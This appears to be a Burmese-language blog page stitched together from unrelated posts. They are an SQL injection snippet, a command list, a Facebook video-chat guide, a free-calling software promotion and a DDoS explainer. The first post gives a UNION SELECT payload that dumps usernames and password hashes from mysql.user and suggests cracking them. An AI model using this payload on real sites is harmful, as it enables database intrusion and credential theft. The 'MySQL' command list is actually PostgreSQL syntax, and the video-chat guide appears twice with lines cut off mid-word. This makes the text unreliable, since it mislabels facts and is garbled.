---MySQL ROOT---
MySQL version 5 နဲ႔အထက္မွာ mysql.user ဆုိတဲ႔ table တစ္ခုဟာ MySQL servers ေတြမွာရွိပါတယ္... အထဲမွာ hash လုပ္ထားတဲ႔ Password နဲ႔ username ေတြပါ၀င္ပါတယ္... ၄င္းအထဲက
hash ဟာ mysqlsha1 ၿဖစ္တဲ႔အတြက္ John The Ripper နဲ႔ crack လုပ္ဖုိ႔ခက္ပါမယ္..
www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 from mysql.user/*
ဒီအတြက္ InsidePro Password Recovery Software ကုိသုံးလုိ႔ရပါတယ္..
http://www.insidepro.com
---အသုံး၀င္တဲ႔ MySQL commands အခ်ိဳ႕ပါ..---
ABORT — abort the current transaction
ALTER DATABASE — change a database
ALTER GROUP — add users to a group or remove users from a group
ALTER TABLE — change the definition of a table
ALTER TRIGGER — change the definition of a trigger
ALTER USER — change a database user account
ANALYZE — collect statistics about a database
BEGIN — start a transaction block
CHECKPOINT — force a transaction log checkpoint
CLOSE — close a cursor
CLUSTER — cluster a table according to an index
COMMENT — define or change the comment of an object
COMMIT — commit the current transaction
COPY — copy data between files and tables
CREATE AGGREGATE — define a new aggregate function
CREATE CAST — define a user-defined cast
CREATE CONSTRAINT TRIGGER — define a new constraint trigger
CREATE CONVERSION — define a user-defined conversion
CREATE DATABASE — create a new database
CREATE DOMAIN — define a new domain
CREATE FUNCTION — define a new function
CREATE GROUP — define a new user group
CREATE INDEX — define a new index
CREATE LANGUAGE — define a new procedural language
CREATE OPERATOR — define a new operator
CREATE OPERATOR CLASS — define a new operator class for indexes
CREATE RULE — define a new rewrite rule
CREATE SCHEMA — define a new schema
CREATE SEQUENCE — define a new sequence generator
CREATE TABLE — define a new table
CREATE TABLE AS — create a new table from the results of a query
CREATE TRIGGER — define a new trigger
CREATE TYPE — define a new data type
CREATE USER — define a new database user account
CREATE VIEW — define a new view
DEALLOCATE — remove a prepared query
DECLARE — define a cursor
DELETE — delete rows of a table
DROP AGGREGATE — remove a user-defined aggregate function
DROP CAST — remove a user-defined cast
DROP CONVERSION — remove a user-defined conversion
DROP DATABASE — remove a database
DROP DOMAIN — remove a user-defined domain
DROP FUNCTION — remove a user-defined function
DROP GROUP — remove a user group
DROP INDEX — remove an index
DROP LANGUAGE — remove a user-defined procedural language
DROP OPERATOR — remove a user-defined operator
DROP OPERATOR CLASS — remove a user-defined operator class
DROP RULE — remove a rewrite rule
DROP SCHEMA — remove a schema
DROP SEQUENCE — remove a sequence
DROP TABLE — remove a table
DROP TRIGGER — remove a trigger
DROP TYPE — remove a user-defined data type
DROP USER — remove a database user account
DROP VIEW — remove a view
END — commit the current transaction
EXECUTE — execute a prepared query
EXPLAIN — show the execution plan of a statement
FETCH — retrieve rows from a table using a cursor
GRANT — define access privileges
INSERT — create new rows in a table
LISTEN — listen for a notification
LOAD — load or reload a shared library file
LOCK — explicitly lock a table
MOVE — position a cursor on a specified row of a table
NOTIFY — generate a notification
PREPARE — create a prepared query
REINDEX — rebuild corrupted indexes
RESET — restore the value of a run-time parameter to a default value
REVOKE — remove access privileges
ROLLBACK — abort the current transaction
SELECT — retrieve rows from a table or view
SELECT INTO — create a new table from the results of a query
SET — change a run-time parameter
SET CONSTRAINTS — set the constraint mode of the current transaction
SET SESSION AUTHORIZATION — set the session user identifier and the current user identifier of the current session
SET TRANSACTION — set the characteristics of the current transaction
SHOW — show the value of a run-time parameter
START TRANSACTION — start a transaction block
TRUNCATE — empty a table
UNLISTEN — stop listening for a notification
UPDATE — update rows of a table
VACUUM — garbage-collect and optionally analyze a database
SQL Injection မွာ အသုံးၿပဳတဲ႔ အေၿခခံေတြပဲ ရွိပါေသးတယ္... ဒီထက္မ်ားတဲ႔ functions ေတြအမ်ားၾကီးရွိသလုိ ဒီထက္ပုိၿပီးနက္နဲတဲ႔ အသုံးၿပဳပုံေတြရွိပါတယ္... ေလ့လာတဲ႔သူေတြအေနနဲ႔ မိမိတုိ႔ကုိယ္တုိင္ SQL commands ေတြကုိ အရင္ဆုံး ကုိယ္တုိင္စမ္းစစ္ၿပီး မိမိတုိ႔ရဲ႕ SQL commands အသုံးၿပဳမႈအရည္အခ်င္းကုိ ၿမင့္တင္သင့္ပါတယ္။
မွတ္ခ်က္။ ။ဒီပို႕ေလးက online ေပၚမွာ ျပန္႕ေနတာၾကာျပီ။ဘာလို႕ copy ကူးျပီးျပန္တင္ရတာလဲဆို
ေတာ့ ကၽြန္ေတာ္ကိုယ္တိုင္သိမ္းထားခ်င္လို႕ပါ။ဒါေလးက အေျခခံက်ပါတယ္။သိသင့္သိထိုက္သူေတြလဲ
သိႏိုင္ၾကပါေစ။
Facebook video chat ကိုအသံုးၿပဳၿခင္း………
အခုေဖာ္ၿပေပးမယ္႕ နည္းလမ္းကေတာ႕ facebook မွာ video chat အသံုးၿပဳနည္းဘဲၿဖစ္ပါတယ္
ကဲ လုပ္ၾကည္႕လိုက္ရေအာင္ အသံုးၿပဳသူမ်ားအေနနဲ႕ ပထမ ဦးစြာ
www.facebook.com/videocalling
ကိုသြားၿပီး Get Started ကိုႏွိပ္ကာ ေအာက္ပါအဆင္႕ေတြကိုၿပဳလုပ္ၿပီးအသံုးၿပဳႏိုင္ပါတယ္၊
(၁)facebook ရဲ႕ video chat feature ပာာ facebook ရဲ႕ built-in chat
စနစ္နဲ႕ခ်ိတ္ဆက္ထားၿခင္းၿဖစ္ပါတယ္၊ဒါေၾကာင္း video chat feature ကိုအသံုးၿပဳလိုပါက
ပထမဦးဆံုးအေနနဲ႕ chat siderbar ရွိ တစ္ေယာက္ေယာက္ရဲ႕အမည္ကိုေရႊးၿပီး massaging sessio
ကို
ဖြင္႕ပါ။
(၂)Chat widow ရဲ႕အေပၚညာဘက္ေထာင္႕မွာ video icon ကိုေတြ႕ပါက ႏွိပ္ပါ။ေပၚလာတဲ႕ box မွာ
Webcam နဲ႕ microphone ကို ခ်ိတ္ဆက္ရန္လိုအပ္တဲ႕ ေဆာ႕၀ဲလ္ၿဖစ္တဲ႕ facebook video call
setup
ဖိုင္ကို download လုပ္ရန္ Set up ကိုွႏိွပ္ပါ။
(၃)Download လုပ္ၿပီးပါက install လုပ္ပါ။ install လုပ္ၿပီးတဲ႕အခါမွာ vide
ရဲ႕နာမည္ကိုေရြးၿပီး chat window ရွိ video icon ကိုႏွိပ္ပါ၊တစ္ဖက္အသံုးၿပ
လက္ခံၿပီးတဲ႕အခါမွာ
ေခၚဆိုသူနဲ႕လက္ခံသူႏွစ္ေယာက္လံုးကို pop up window မွာေတြ႕ရမွာၿဖစ
(၄)အသံအေနနဲ႕ေတာ႕ video window ရဲ႕ ေအာက္ေၿခရွိ bar ကို ႏွိပ္ၿပီးအ
(၅)ပိတ္ခ်င္တယ္ဆိုရင္ေတာ႕video window ေထာင္႕ဖက္ရွိ X ကိုႏွိပ္လိုက္ပ
Facebook မွာ video chat ထည္႕သြင္းထားတာေတာ႕ၾကာပါၿပီ၊တခ်ိဴ႕လည
ကြ်န္ေတာ္မေရးရေသးလို႕တင္ေပးလိုက္တာဘဲ၊အဆင္ေၿပပါေစဗ်ာ………..
ကဲ လုပ္ၾကည္႕လိုက္ရေအာင္ အသံုးၿပဳသူမ်ားအေနနဲ႕ ပထမ ဦးစြာ
www.facebook.com/videocalling
ကိုသြားၿပီး Get Started ကိုႏွိပ္ကာ ေအာက္ပါအဆင္႕ေတြကိုၿပဳလုပ္ၿပီးအသံုးၿပဳႏိုင္ပါတယ္၊
(၁)facebook ရဲ႕ video chat feature ပာာ facebook ရဲ႕ built-in chat
စနစ္နဲ႕ခ်ိတ္ဆက္ထားၿခင္းၿဖစ္ပါတယ္၊ဒါေၾကာင္း video chat feature ကိုအသံုးၿပဳလိုပါက
ပထမဦးဆံုးအေနနဲ႕ chat siderbar ရွိ တစ္ေယာက္ေယာက္ရဲ႕အမည္ကိုေရႊးၿပီး massaging sessio
ကို
ဖြင္႕ပါ။
(၂)Chat widow ရဲ႕အေပၚညာဘက္ေထာင္႕မွာ video icon ကိုေတြ႕ပါက ႏွိပ္ပါ။ေပၚလာတဲ႕ box မွာ
Webcam နဲ႕ microphone ကို ခ်ိတ္ဆက္ရန္လိုအပ္တဲ႕ ေဆာ႕၀ဲလ္ၿဖစ္တဲ႕ facebook video call
setup
ဖိုင္ကို download လုပ္ရန္ Set up ကိုွႏိွပ္ပါ။
(၃)Download လုပ္ၿပီးပါက install လုပ္ပါ။ install လုပ္ၿပီးတဲ႕အခါမွာ vide
ရဲ႕နာမည္ကိုေရြးၿပီး chat window ရွိ video icon ကိုႏွိပ္ပါ၊တစ္ဖက္အသံုးၿပ
လက္ခံၿပီးတဲ႕အခါမွာ
ေခၚဆိုသူနဲ႕လက္ခံသူႏွစ္ေယာက္လံုးကို pop up window မွာေတြ႕ရမွာၿဖစ
(၄)အသံအေနနဲ႕ေတာ႕ video window ရဲ႕ ေအာက္ေၿခရွိ bar ကို ႏွိပ္ၿပီးအ
(၅)ပိတ္ခ်င္တယ္ဆိုရင္ေတာ႕video window ေထာင္႕ဖက္ရွိ X ကိုႏွိပ္လိုက္ပ
Facebook မွာ video chat ထည္႕သြင္းထားတာေတာ႕ၾကာပါၿပီ၊တခ်ိဴ႕လည
ကြ်န္ေတာ္မေရးရေသးလို႕တင္ေပးလိုက္တာဘဲ၊အဆင္ေၿပပါေစဗ်ာ………..
Tuesday, February 28, 2012
phone အလြယ္တကူ..ေငြမေပးဘဲေခၚရေအာင္
ကၽႊန္ေတာ့္ကုိသူငယ္ခ်င္းတစ္ေယာက္ကေ၀မွ်ေပးလိုက္တာပါ။ ညီရွင္းသန္႔ကိုေက်းဇူးတင္ပါတယ္။ ယခုလို pfingo ,skype တို႔လို႔၀ယ္စရာမလိုေတာ့ဘူး။ ေငြအကုန္သက္သာတဲ့အၿပင္.... အဲဒီေဆာ့၀္လ္ကဆိုဒ္ေတာ္ေတာ္မ်ားမ်ားမွာေတြ႔တယ္လို႔ေၿပာတယ္။ အဲဒီေဆာ့၀္လ္ကိုဖြင့္တာနဲ႔ ကိုယ့္ရဲ႔ဖုန္းနံပါတ္ၿပတယ္။ ကိုယ္ေခၚခ်င္တဲ့လူရဲ႔ဖုန္းနံပါတ္ထည့္...ဘယ္ကၿဖစ္ၿဖစ္ရတယ္...ဟန္းဖုန္း...တယ္လီဖုန္းတို႔ရတယ္။ တကယ္လည္းစမ္းၾကည့္ပါ။ အက်ိဳးတကယ္ရွိတဲ့အၿပင္ ဖုန္းအစစ္လို Contacts ပါတယ္။ သူငယ္ခ်င္းအသစ္ရွာ...ဘာမွမၿဖစ္ဘူး။ အသံ၊ ကြန္ပ်ဴတာနဲ႔ခ်က္တာ..video(vzochat လို)ပါတယ္။ register လုပ္စရာမလို..spyware..virus လံုး၀မရွိေစရဘူး။ ေဆာ့၀္လ္ကအလကားေပးတာ(သားကအလကားမွယူခ်င္တာ..ဟီး)။ဘယ္သူပဲၿဖစ္ၿဖစ္..လ်ိဳ႔၀ွက္ဖုန္းနံပါတ္ကိုရရွိႏိုင္တယ္။
ေဆာ့၀္လ္နာမည္က CQPhone ပါ။ ဖိုင္ဆိုဒ္ကေပါ့ေပါ့ပါးပါးပါ။ 2.62 MB ရွိပါတယ္။ သူ႔ရဲ႔မူရင္းဆိုဒ္က http://www.cqphone.com/ ပါ။ အခု version က 2.4 ပဲရွိပါေသးတယ္(ေလာေလာဆယ္ကိုေၿပာတာ)။ မူရင္းေဒါင္းလုတ္လင့္က http://www.cqphone.com/cqsetup2404.exe မွာပါ။
ဒီ ပို႕ ေလးက စိမ္႕စမ္းေရ စီကပါ ကြ်န္ေတာ္ မအားလို႕ ကိုယ္ပိုင္ပို႕မတင္ႏိုင္တာခြင္႕လႊတ္ပါဗ်ာ၊ဒါေပမယ္႕ ကြ်န္ေတာ္တို႕ ဘေလာ႕ကာညီအစ္ကိုေမာင္ႏွမေတြရဲ႕ ပို႕ေတြက ခင္ဗ်ားတို႕ကို ဗပာုသုတရေစမွာေသခ်ာပါတယ္၊ စိမ္႕စမ္းေရ ကိုလည္းေက်းဇူးတင္ပါတယ္။
ယေန႔ေခတ္စား လာတဲ့ ျမန္မာႏုိင္ငံကိုခ်ိန္းေျခာက္ေနေသာ DDoS attack အေၾကာင္း..................
DoS ဆုိတဲ႔ တုိက္ခုိက္မႈဟာ ယေန႔ေခတ္မွာ အင္တာနက္ တုိက္ခုိက္ေရးသမားတုိ႔ အသုံးၿပဳတဲ႔ နည္းလမ္းတစ္ခုလည္းၿဖစ္ပါတယ္.. Denial of Service ဆုိတဲ႔အတုိင္း အတုိက္ ခုိက္ခံရသူရဲ႕ Computer သုိ႔မဟုတ္ Webserver ရဲ႕ Bandwidth , CPU, Memory အသုံးၿပဳမႈေတြက သာမာန္ေပးစြမ္းႏုိင္တဲ႔ ပမာဏထက္ ပုိၿပီးလုိအပ္တဲ႔အတြက္ Out of Service ေတြ ၿဖစ္ကုန္တာပါ။ ၾကားၿဖတ္၍ Resource အားလုံးကုိ စားသုံးလုိက္ၿခင္းပဲ ၿဖစ္ပါတယ္။ ထပ္ၿပီး ရွင္းေအာင္ေၿပာရမယ္ဆုိရင္ ကၽြန္ေတာ္တုိ႔က www.planetcreator.net ဆုိၿပီး Browser မွာရုိက္ထည့္လုိက္ရင္ ေနာက္မွာ အလုပ္ လုပ္ေပးတာက www.planetcreator.net တင္ထားတဲ႔ Webserver က အလုပ္လုပ္ ေၿဖၾကား၊ ေဖာ္ေဆာင္ေပးရတာၿဖစ္ပါတယ္။ ဒီေတာ့ သာမာန္ေတာင္းဆုိမႈနဲ႔ ပုိတဲ႔ Fade Request ေတြကုိ server ကၿပန္လည္ေၿဖၾကား ေပးေနရတဲ႔အတြက္ Over Load ၿဖစ္ကာ Server က ဆက္သြယ္မႈရပ္တန္႔သြားရၿခင္းၿဖစ္ပါတယ္။
DoS တုိက္ခုိက္မႈမွာ သတ္မွတ္ထားတဲ႔ Targeted System (Victim) နဲ႔ ၄င္း System ရဲ႕ Port, network component, firewall ကုိ အတိအက်ေရြးခ်ယ္ တုိက္ခုိက္တာၿဖစ္တဲ႔ အၿပင္ printer ေတြ Alarm System ေတြၿပတ္ေတာက္သြားေအာင္ တုိက္ခုိက္တာလည္းရွိပါတယ္....
ဒါေၾကာင့္ DoS အတုိက္ခံရၿပီဆုိရင္
* Network ရဲ႕ စြမ္းရည္က်ဆင္းလာၿခင္း (ေႏွးေကြးလာၿခင္း)
* Website မ်ားကုိ အသုံးၿပဳတဲ႔အခါ အသုံးၿပဳ၍ မရၿခင္း (တုိက္ခုိက္တဲ႔သူက http server ကုိ request အေၿမာက္အမ်ားေတာင္းဆုိၿခင္းေၾကာင့္)
* spam mail ေတြ အ၀င္မ်ားလာၿခင္း ( Mail Server ပ်က္စီးမယ္/တုိက္ခုိက္သူက အခ်ိန္တုိအတြင္းမွာ ေမးလ္ေတြ ေထာင္ေပါင္းမ်ားစြာကုိ victim အားပုိ႔ေဆာင္ေသာေၾကာင့္)
* Computer or Webserver မ်ားရဲ႕ CPU & Memory Usage ေတြ ၿမင့္တက္ေနၿခင္းတုိ႔ကုိေတြ႔ရႏုိင္ပါတယ္။
တုိက္ခုိက္ပုံ
DoS ရဲ႕ တုိက္ခုိက္ပုံကေတာ့ Peer to Peer တုိက္ခိုက္သလုိပါပဲ... အထူးၿပဳလုပ္ထားတဲ႔ DoS Tool ေတြနဲ႔ Vitim ရဲ႕ host သုိ႔မဟုတ္ ip address and port ေတြကုိ အခ်ိန္တုိ အတြင္းမွာ request ေပါင္းမ်ားစြာေတာင္းဆုိ အသုံးၿပဳၿခင္းပဲၿဖစ္ပါတယ္။
တုိက္ခုိက္တဲ႔ မႈကြဲေတြကေတာ့
* ICMP Flood
* Teardrop Attack
* Peer-to-Peer Attack
* Permanent Denial of Service
* Application Level Floods (IRC Floods)
* Nuke
* Distributed Attack
* Reflected Attack
* Degradation-of-Service
* Unintentional Denial of Service
* Denial of Service Level II
* Blind Denial of Service
DDoS ( Distributed Denial of Service) ဆုိတာ DoS ရဲ႕ Advanced Version တစ္ခုလုိ႔ ဆုိႏုိင္ပါတယ္။ ပစ္မွတ္ Server တစ္ခုကုိ flooding packets ေပါင္းမ်ားစြားအာ
single network တစ္ခုကတင္ မဟုတ္ပဲနဲ႔ Multiple host or network ေတြကေနတုိက္ခုိက္တာပါ။ DDoS က ယေန႔ေခတ္အတြက္ ကုရာ နတၳိေဆးမရွိသလုိၿဖစ္ေနၿပီး မိမိသုံး
တဲ႔ Server ရဲ႕ Security အားနည္းတာလည္း ၿဖစ္နိင္သလုိ site ရဲ႕ security ေစာင့္ၾကည့္မူ႔ေတြအားနည္းမူ႔ေၾကာင့္လည္း ၿဖစ္ပါတယ္။
ဘယ္လုိပဲၿဖစ္ေစ DoS နဲ႔ DDoS ကုိကၽြန္ေတာ္တုိ႔ ထပ္ၿပီး အနည္းငယ္ အက်ယ္ခ်ဲ႕ ၾကည့္ရေအာင္.. ကၽြန္ေတာ္က လူတစ္ေယာက္ကုိ စိတ္ပုိင္းဆုိင္ရာ ေႏွာက္ယွက္ခ်င္တယ္ဆုိရင္ အဲ႔လူရဲ႕ ဖုန္းနံပါတ္ကုိေကာက္ႏုိပ္လုိက္မယ္.. ၿပီးရင္ အဲ႔လူနားေထာင္ေလာက္တဲ႔ အခ်ိန္က်မွ ဖုန္းကုိ ေကာက္ခ်လုိက္မယ္.. ဒီလုိအၾကိမ္အေရအတြက္ မ်ားလာခဲ႔မယ္ဆုိရင္ တစ္ဖက္ကလူလည္းအေႏွာက္အယွက္ၿဖစ္မယ္... စိတ္ညစ္မယ္ေပါ႔.. ဒါဟာ Attacker to Victim တုိက္ရုိက္ ဆက္ႏြယ္တဲ႔ DoS နည္းလမ္းပဲ... ဒါေပမဲ႔ Victim က နည္းပညာေကာင္းၿပီး Attacker ရဲ႕ ဖုန္းနံပါတ္ေလးတစ္ခုတည္းကုိပဲ Block လုပ္ထားလုိက္မယ္ဆုိရင္ Attacker က ေခၚလုိ႔ရမွာမဟုတ္ေတာ့ဘူး ... ဒီလုိအခ်ိန္မွာ Attacker က ထပ္ေလာင္း၍ တစ္ၿခားနည္းလမ္းကုိသုံးလာလိမ့္မယ္.. အဲ႔ဒါကေတာ့ Radio Station ေတြကေနၿပီးေတာ့ လာမည့္ဘယ္ေန႔ ဘယ္အခ်ိန္မွာ ဘယ္ပြဲအတြက္ လက္မွတ္ေတြကုိ ေစ်းႏႈန္းခ်ဳိသာစြာေရာင္းခ်ေနတယ္... ေနာက္ထပ္ ဘယ္ေနရာမွာ အႏၱရာယ္နဲ႔ေတြ႔ေနတယ္.. ဒီလုိ Fade ေတြကုိ Victim နဲ႔ သတ္ဆုိင္တဲ႔သူေတြကုိ သတင္းေပးလုိက္မယ္ဆုိရင္ Victim ရဲ႕ မိတ္ေဆြအေပါင္းအသင္းေတြကလည္း Victim ကုိ တစ္ေယာက္ၿပီးတစ္ေယာက္ ဖုန္းဆက္ အေၾကာင္းၾကား အသိေပးေနေတာ့မွာပါပဲ.. ဒါက Distributed လုပ္တယ္လုိ႔ ေခၚတယ္.. တစ္နည္းအားၿဖင့္ DDoS ေပါ႔...
Distributed လုပ္တဲ႔ေနရာမွာ Attacker (Hacker) ေတြက Malware, Virus ေတြနဲ႔ၿဖစ္ေစ Fade Mail, Social Engineering နဲ႔ၿဖစ္ေစ အြန္လုိင္းကုိ ၿဖန္႔လုိက္ပါတယ္... ၄င္း Attacker ရဲ႕ Malware,Virus ေတြ မိမိစက္ထဲကုိေရာက္လာတာပဲၿဖစ္ေစ Social Engineering နဲ႔ေရာက္လာတာပဲ ၿဖစ္ေစ မိမိရဲ႕ စက္ဟာ Attacker ရဲ႕ အသုံးခ်ခံၿဖစ္သြား ပါၿပီ... ဒါကုိ Zombie လုိ႔ေခၚပါတယ္... ဒီ Zombie ေတြဟာ ဟက္ကာေတြရဲ႕ ခုိင္းေစတာကုိ လုပ္ေဆာင္ဖုိ႔ အခ်ိန္တုိင္းအသင့္ရွိေနၾကပါတယ္... ဒီလုိအြန္လုိင္းမွာ ဟက္ကာေတြ ရဲ႕ အသုံးခ်ခံေနရတဲ႔ Zombie ေတြက မနည္းပါဘူး။ ဒီအခ်ိန္မွာ တုိက္ခုိက္မဲ႔ Attacker (Hacker) က ၄င္းရဲ႕ Zombie ေတြကုိ အခ်ိန္၊ ေနရာ ေတြကုိ ညြန္ၾကားေပးလုိက္တာနဲ႔ Victim ကုိ အားလုံး Fade Request, Fade Mail ေတြ ပုိ႔ေဆာင္ၾကတာပါပဲ...
Fade Mail ဆုိတာက Mail Bomber ပုံစံမ်ဳိး တစ္ၾကိမ္မွာ ေမးလ္ေပါင္း ေသာင္းနဲ႔ ခ်ီၿပီး ပုိ႔ေဆာင္ႏုိင္သလုိ ၄င္းကုိ Distributed လုပ္ၿပီးတုိက္ခုိက္တာလည္းရွိပါတယ္... သာမာန္ user တစ္ေယာက္က ထုိသူသြားလည္တဲ႔ Website (www.abc.com) တစ္ခု ရွိတယ္ဆုိၾကပါစုိ႔ .. Attacker က ၄င္းရဲ႕ Website မွာ စိတ္၀င္စားစရာ ေၾကာ္ၿငာေလး တစ္ခုထည့္ထားမယ္ ... ဒီအခ်ိန္မွာ ၄င္း site (www.abc.com) ကုိလာေရာက္လည္ပတ္တဲ႔သူေတြက ၄င္း ေၾကာ္ၿငာ္ေလးကုိ ႏုိပ္လုိက္တုိင္းမွာ Attacker ၾကိဳတင္သတ္မွတ္ ထားတဲ႔ Victim ရဲ႕ mail server ကုိ ေမးလ္ေပါင္း ေၿမာက္မ်ားစြာ ပုိ႔ၾကပါလိမ့္မယ္... ဒီလုိအခ်ိန္မွာ တစ္ဖက္က SMTP/POP စသည့္ Mail Server ေတြက Down သြားႏုိင္ပါ တယ္။
ဒါဟာ ရုိးရွင္းတဲ႔ တုိက္ခုိက္မႈပဲရွိပါေသးတယ္...DoS and DDoS တုိက္ခုိက္မႈမွာ 'packet-forgery' ေခၚတဲ႔ packet အတုအေယာင္ ဖန္တီးၿခင္း၊ 'IP spoofing' ေခၚတဲ႔ IP Address ကုိ packet နဲ႔အတူေၿပာင္းလဲၿခင္း စသည္အမ်ားၾကီးရွိပါေသးတယ္..
ဒီေနရာမွာ Ethernet ဆုိတာကုိ နဲနဲေလး လူဗိန္းနားလည္ေလာက္တဲ႔ ပုံစံနဲ႔ ေၿပာပါမယ္.. Ethernet ရဲ႕ System ေတြဆက္သြယ္မႈမွာ "packets" frames ေလးေတြ ကရွိပါတယ္ အဲ႔ frame ထဲ destination address, source address type field and data ေလးေတြပါ၀င္ပါတယ္... Ethernet address က 6 bytes ရွိၿပီး ၄င္းတုိ႔ရဲ႕ ကုိယ္ပုိင္ Ethernet Address တစ္ခုစီ ရွိၾကပါတယ္။ Ethernet က အသုံးၿပဳတာက CSMA/CD (Carrier Sense and Multiple Access with Collision Detection) ကုိအသုံးၿပဳတာၿဖစ္တဲ႔အတြက္ ၄င္းတုိ႔က Data တစ္ခုပုိ႔ေတာ့မယ္ဆုိရင္ ၄င္းပုိ႔မယ့္ Destination လမ္းေၾကာင္းေပၚမွာ သူပုိ႔ေဆာင္တဲ႔ Data ေတြ ရွိမရွိစစ္ပါတယ္... ရွိေသးရင္ ေခတၱခဏ ေစာင့္ၿပီးမွ ထပ္ပုိ႔ပါ တယ္... ဒီလုိလုပ္တာကုိ Collision Detection လုပ္တယ္လုိ႔ေခၚပါတယ္.. ဒီေတာ့ တစ္ခါပုိ႔ႏုိင္ၿပီး လက္ခံတာကေတာ့ အဆက္မၿပတ္လက္ခံႏုိင္တယ္ဆုိတဲ႔ သေဘာေပါ႔....
ဒါကုိ ဥပမာတစ္ခုထပ္ေပးမယ္... Ethernet technology ဆုိတာ အေမွာင္ခန္းထဲမွာ လူေတြ၀ုိင္းဖြဲ႕ စကားေၿပာတာနဲ႔တူပါတယ္... အခန္းထဲမွာဘယ္သူေၿပာေၿပာ အားလုံးက ၾကားပါတယ္.. ဒါက Carrier Sense ၿဖစ္ပါတယ္။ အခန္းထဲက လူတုိင္းက သူတုိ႔ စိတ္ဆႏၵရွိရင္ ေၿပာဆုိႏုိင္ပါတယ္.. ဒါက Multiple Access ၿဖစ္ပါတယ္.. ဒါေပမဲ႔ေၿပာတဲ႔သူ ေတြတုိင္းက ယဥ္ေက်းသိမ္ေမြ႔တဲ႔အတြက္ စကားေၿပာတဲ႔ ေနရာမွာ ဆင္ၿခင္ၾကတယ္ေပါ႔... အကယ္၍ တစ္ေယာက္က စကားေၿပာတဲ႔အခါမွာ ေနာက္တစ္ေယာက္က ပထမတစ္ ေယာက္ရဲ႕ စကားအၿပီးကုိေစာင့္ၾကၿပီး ဘာမွမေၿပာပါဘူး... ဒါက Collision Detection ၿဖစ္ပါတယ္။ အခန္းထဲမွာ ရွိတဲ႔ လူေတြမွာ နာမည္ကုိယ္စီရွိၾကပါတယ္.. ဒါက unique Ethernet address ၿဖစ္ပါတယ္... ဒီအခ်ိန္မွာ အခန္းထဲက လူတစ္ေယာက္က " Hello, brb, I'm PlanetCreator " လုိ႔ေၿပာရင္ ဒါက Ethernet destination and source
address ၿဖစ္ပါတယ္... ေၿပာမဲ႔သူက အားလုံးကုိ ေၿပာခ်င္တယ္ဆုိရင္ "Hello everyone, I'm PlanetCreator" လုိ႔ေၿပာပါလိမ့္မယ္.. ဒါက Broadcast Message လုိ႔ေခၚပါတယ္ အၿဖစ္အမ်ားဆုံးကေတာ့ ဒီအခန္းထဲမွာ ရွိတဲ႔သူေတြအားလုံးက တစ္ေယာက္ကုိ တစ္ေယာက္ ယုံၾကည္တဲ႔အတြက္ စကားကုိ လ်ဳိ႕၀ွက္ခ်က္မပါပဲ ပြင့္ပြင့္လင္းလင္းေၿပာၾကပါ တယ္... ဒါက non-encrypted data communication is common ၿဖစ္ပါတယ္..
ဒီအခ်ိန္မွာ အခန္းထဲကုိ လူစိမ္းတစ္ေယာက္က ၀င္လာတယ္ဆုိပါစုိ႔ ဒါကုိ (has tapped that Ethernet segment) လုိ႔သတ္မွတ္မယ္... အထဲမွာေၿပာတဲ႔သူေတြအားလုံးက လ်ဳိ႕၀ွက္ခ်က္မရွိပဲေၿပာသလုိ ၀င္ေရာက္လာတဲ႔ လူစိမ္းကလည္း စကား၀ိုင္းကုိ မေႏွာက္ယွက္ပဲ ထုိင္ၿပီးနားေထာင္ေနမယ္ .. ဒါကုိ Sniffing လုပ္တယ္လုိ႔ေခၚမယ္... ၿပီးရင္ အခန္းထဲက ၿပန္ထြက္သြားမယ္... ဘာမွေႏွာက္ယွက္မႈမလုပ္ခဲ႔တဲ႔အတြက္ သူ႔ကုိ Detect လုပ္ဖုိ႔ခက္ပါတယ္.. ဒီေလာက္ပါပဲ...
ဒီအခ်ိန္မွာ ၀င္ေရာက္လာတဲ႔ လူစိမ္းက အဆက္မၿပတ္ေၿပာေနမယ္ဆုိရင္ ဒါက DoS to that segment of the Ethernet ၿဖစ္တယ္လုိ႔ေခၚၿပီး သူတစ္ေယာက္တည္းတင္သာမ က အၿခားသူမ်ားကုိပါ စကားေတြ တစ္ၿပိဳင္နက္ထဲေၿပာေအာင္ လုပ္တယ္ဆုိရင္ DDoS ေပါ႔... ၿပီးရင္ အခန္းတစ္ခုလုံး လက္ပံပင္ဇရပ္ၿဖစ္သြားေတာ့ စကား၀ုိင္းေခၚတဲ႔ server ပ်က္ၿပီေပါ႔...
လူစိမ္းက ခဏကလုိ စကားေတြေၿပာတဲ႔အခါ အၿခားသူတစ္ေယာက္လုိ အသံမ်ဳိးနဲ႔ ထၿပီး စကားေၿပာမယ္.. ေနာက္တစ္ခါ ေနာက္တစ္ေယာက္ ေလသံနဲ႔ အသံတုလုပ္ေၿပာမယ္ ဆုိရင္ ဒါက IP Spoofing လုပ္တယ္ေခၚတယ္... ၿပီးရင္ ေနာက္တစ္ေယာက္ကုိ နာမည္အတုနဲ႔ စကားေတြေၿပာေနမယ္ဆုိရင္ packet forgery လုိ႔ေခၚတယ္...
သာမာန္အတြက္ Attacker (Hacker) က How are you ? ဆုိတဲ႔ ေမးလ္ခြန္းကုိ Server (Victim) က I'm fine ဆုိၿပီးတစ္ခါေၿဖႏုိင္ပါတယ္။ ဒါေပမဲ႔ Attacker ဖန္တီးထားတဲ႔ Zombie ေတြက တစ္ခ်ိန္တည္း တစ္ၿပိဳင္တည္း How are you? How are you? How are you? ဆုိၿပီး အုံလုိက္ေမးတဲ႔အခါ server က တစ္ေယာက္ကုိေၿဖၾကားေပးၿပီး ေနာက္တစ္ေယာက္ကုိ ေၿဖၾကားေပးဖုိ႔ လုပ္ေဆာင္ရပါတယ္... ဒီလုိေၿဖၾကားေနရတာမ်ားေတာ့ CPU ေတြ RAM ေတြက မခံႏုိင္ေတာ့ပါဘူး။ ဒါေၾကာင့္ ဆက္သြယ္မႈေတြ ၿပတ္ေတာက္သြားတာပါ။ Server Overload ၿဖစ္ၿပီး Data ေတြ ဆုံးရႈံးတဲ႔အထိ ၿဖစ္တတ္ပါတယ္။
DoS or DDoS attack ကုိဘယ္ကုိကာကြယ္မလဲ ဆုိတာကေတာ့ ရာႏႈန္းၿပည့္ကာကြယ္ႏုိင္တဲ႔ နည္းလမ္းကုိ မေတြ႔ေသးပါဘူး။ ဒါေပမဲ႔ ေကာင္းမြန္တဲ႔နည္းလမ္းတစ္ခ်ဳိ႕ေတာ့ရွိပါ တယ္...
* အၿမဲတမ္းမိမိရဲ႕ anti virus program ကုိ update လုပ္ေပးပါ
* Firewall အားမွန္ကန္၍ တင္းၾကပ္ေသာ rule မ်ားသတ္မွတ္ပါ...
